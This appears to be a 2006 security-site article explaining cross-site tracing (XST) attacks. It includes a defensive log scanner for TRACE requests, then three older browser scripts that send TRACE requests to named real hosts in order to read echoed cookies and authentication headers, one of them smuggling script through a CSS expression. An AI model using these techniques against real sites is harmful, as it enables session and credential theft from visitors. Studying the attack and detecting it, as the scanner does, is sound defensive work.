myhack58 | Anonymous | MYHACK58:6220066129
Jan 06, 2006 - 12:00 a.m.

Cross-site tracing (XST) attack - vulnerability warning - the black bar safety net

www.myhack58.com

In an XST attack, the attacker embeds malicious code in a web page on a host they control. When a visitor's browser loads the page, the malicious code executes in the browser and sends a TRACE request to the target host. Because the TRACE response echoes the request back, the visitor's cookies, HTTP Basic authentication and NTLM authentication information become readable and are sent to the attacker-controlled host, which enables cookie spoofing or man-in-the-middle attacks.

XST attack conditions:
1. The target web server must allow the TRACE method;
2. The attacker needs a place to insert the XST code;
3. The target site has a cross-domain vulnerability.
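Condition 1 is the one a defender can both observe and remove. The following is an added example, not part of the original article: it scans web-server access logs for TRACE requests (and TRACK, the IIS equivalent) and reports which ones the server actually answered. The Common/Combined Log Format is assumed, and the sample log lines, addresses and paths are constructed.

```javascript
// Added example: find TRACE/TRACK requests in access logs (Common/Combined Log Format assumed).
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Za-z]+) (\S+)[^"]*" (\d{3}) (\S+)/;
const ECHO_METHODS = new Set(["TRACE", "TRACK"]); // TRACK is the IIS equivalent of TRACE

// Returns one finding per TRACE/TRACK request, with a verdict based on the status code.
function findTraceRequests(logText) {
  const findings = [];
  for (const line of logText.split(/\r?\n/)) {
    const m = LOG_LINE.exec(line.trim());
    if (!m) continue; // skip blank or malformed lines
    const [, client, time, rawMethod, path, statusText] = m;
    const method = rawMethod.toUpperCase();
    if (!ECHO_METHODS.has(method)) continue;
    const status = Number(statusText);
    // A 2xx status means the server echoed the request, headers included, to the caller.
    const verdict = status >= 200 && status < 300 ? "ENABLED" : "rejected";
    findings.push({ client, time, method, path, status, verdict });
  }
  return findings;
}

// Paths on which the server answered TRACE/TRACK: these need the method disabled.
function exposedPaths(findings) {
  return [...new Set(findings.filter(f => f.verdict === "ENABLED").map(f => f.path))].sort();
}

// Constructed sample log (documentation IP ranges, hypothetical paths).
const SAMPLE_LOG = `
192.0.2.10 - - [06/Jan/2006:10:00:01 +0000] "GET /forum/index.php HTTP/1.1" 200 5120
192.0.2.10 - - [06/Jan/2006:10:00:02 +0000] "TRACE /forum/ HTTP/1.1" 200 312
198.51.100.7 - - [06/Jan/2006:10:03:40 +0000] "TRACE / HTTP/1.1" 405 226
198.51.100.7 - - [06/Jan/2006:10:03:41 +0000] "track /app/ HTTP/1.1" 501 0
203.0.113.5 - alice [06/Jan/2006:10:05:12 +0000] "TRACE /private/ HTTP/1.1" 200 401
this line is not a log entry
`;

const findings = findTraceRequests(SAMPLE_LOG);
for (const f of findings) {
  console.log(`${f.time} ${f.client} ${f.method} ${f.path} -> ${f.status} (${f.verdict})`);
}
console.log("Disable TRACE/TRACK for:", exposedPaths(findings).join(", "));
```

Any path reported as ENABLED satisfies condition 1; on Apache httpd the `TraceEnable off` directive turns the method off.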

XST compared with XSS:
Similarities: both are highly deceptive and can harm the host. The attack is also cross-platform, and ActiveX controls, Flash, Java, etc. can be used to carry out XST and XSS attacks.
Advantages: XST can bypass ordinary HTTP authentication and NTLM authentication.

Technique 1:
<script type="text/javascript">
<!--
// Send a TRACE request and display the response, which echoes the request headers
function xssTRACE() {
  var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
  xmlHttp.open("TRACE", "http://wmjie.51.net/swords/", false);
  xmlHttp.send();
  var xmlDoc = xmlHttp.responseText;
  alert(xmlDoc);
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick="xssTRACE();" VALUE='XSS TRACE'>

Technique 2:
<script type="text/javascript">
<!--
// Open a new window, point it at the target site, then issue the TRACE request from that window
function xssTRACE() {
  var openWin = open("blank.htm", "swords", "width=500,height=400");
  var otraceswords = openWin.external;
  openWin.location.href = "http://wmjie.51.net/swords/";
  setTimeout(
    function () {
      // The following must be written on one line
      otraceswords.NavigateAndFind('javascript:xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE","http://wmjie.51.net/swords/",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert("no document.cookie 显示 站点 wmjie.51.net/swords/ the header information.\\n" + xmlDoc);', "", "");
    },
    1024
  );
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick="xssTRACE();" VALUE='XSS TRACE'>

Technique 3:
<script type="text/javascript">
// Pass the TRACE script to the target page through a modal dialog's CSS expression
function xssTRACE() {
  var swords = 'var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE","http://www.tingh.com/",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(xmlDoc);';
  var target = "http://wmjie.51.net/swords/";
  var spinach = encodeURIComponent(swords + ';top.close()');
  var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + spinach + '")))';
  showModalDialog(target, null, readyCode);
}
</script>
<INPUT TYPE=BUTTON OnClick="xssTRACE();" VALUE='XSS TRACE'>

I use the team forum's cookies and my own site for testing.